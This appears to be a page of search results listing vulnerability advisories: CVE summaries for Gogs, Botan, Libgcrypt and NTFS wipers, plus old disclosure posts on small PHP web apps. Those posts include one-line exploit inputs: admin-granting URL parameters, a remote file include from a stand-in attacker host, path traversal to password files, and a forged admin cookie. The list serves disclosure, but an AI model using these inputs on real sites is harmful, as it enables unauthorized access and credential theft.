11 matches found
CVE-2025-64719 Gogs: Denial of Service in repository/wiki file listing web pages
Gogs is an open source self-hosted Git service. Prior to 0.14.3, a malicious user with rights to create a new file on a repository or wiki page can trigger a denial of service condition in which the pages containing the listing of files will return HTTP error 500 and render the web interface...
CVE-2002-2069
PGP 6.x and 7.x does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted...
CVE-2002-2067
East-Tec Eraser 2002 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted...
USN-4236-2: Libgcrypt vulnerability
USN-4236-1 fixed a vulnerability in Libgcrypt. This update provides the corresponding fix for Ubuntu 16.04 LTS. Original advisory details: It was discovered that Libgcrypt was susceptible to a ECDSA timing attack. An attacker could possibly use this attack to recover sensitive information...
CVE-2017-14737
A cryptographic cache-based side channel in the RSA implementation in Botan before 1.10.17, and 1.11.x and 2.x before 2.3.0, allows a local attacker to recover information about RSA secret keys, as demonstrated by CacheD. This occurs because an array is indexed with bits derived from a secret key...
CVE-2002-2066
BestCrypt BCWipe 1.0.7 and 2.0 through 2.35.1 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted...
CVE-2002-2067
East-Tec Eraser 2002 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted...
Security holes : Rose, EasyNews, User Online, Mon Album, KorWebLog
Hello people : Product 1 : Rose http://www.jinxm.co.uk Version : 4.52 Problem : - Admin access Exploit : - newsadmin/upload.php?userinfousername=hop&userinfouserlevel=100 Product 2 : EasyNews http://www.webrc.ca Version : 4.3 Problem : - Admin access Exploits : - admin.php?enlogid=0&action=users ...
Security holes in two Teekai's products + security hole in ncmail.netscape.com
Hi : Products : Tracking Online 1.0 Teekai's forum full 1.2 http://www.teekai.info Problems : Tracking Online & Teekai's forum : - Informations recovery - Informations decoding Teekai's forum : - Admin access - small holes Tracking Online : -XSS Exploits : Forum & Tracking : - Php file to decode...
Security holes : Pseudo-Frame, PG, KvPoll, Phorum, BanMat
Product 1 : Pseudo Frame 1.0 http://www.clicky-web.net Problem : - Including file Exploit : - http://www.site.com/index.php? page=http://www.haxor.com/file with file.php on http://www.haxor.com . Product 2 : PG 1.0 http://www.clicky-web.net Problems : - XSS - Path Disclosure Exploits : -...
Security holes : Linker, Pharao
Product1 : Linker http://enproject.codelib.co.kr Versions : 2.0 Problems : - Reading in HD - Informations recovery passwords, DBHOST, DBUSER,... Exploits : - /imageview.php?uid=../function/passinfo.php or /imageview.php?uid=../function/baseinfo.php - Set cookies : "adminlogin","1"...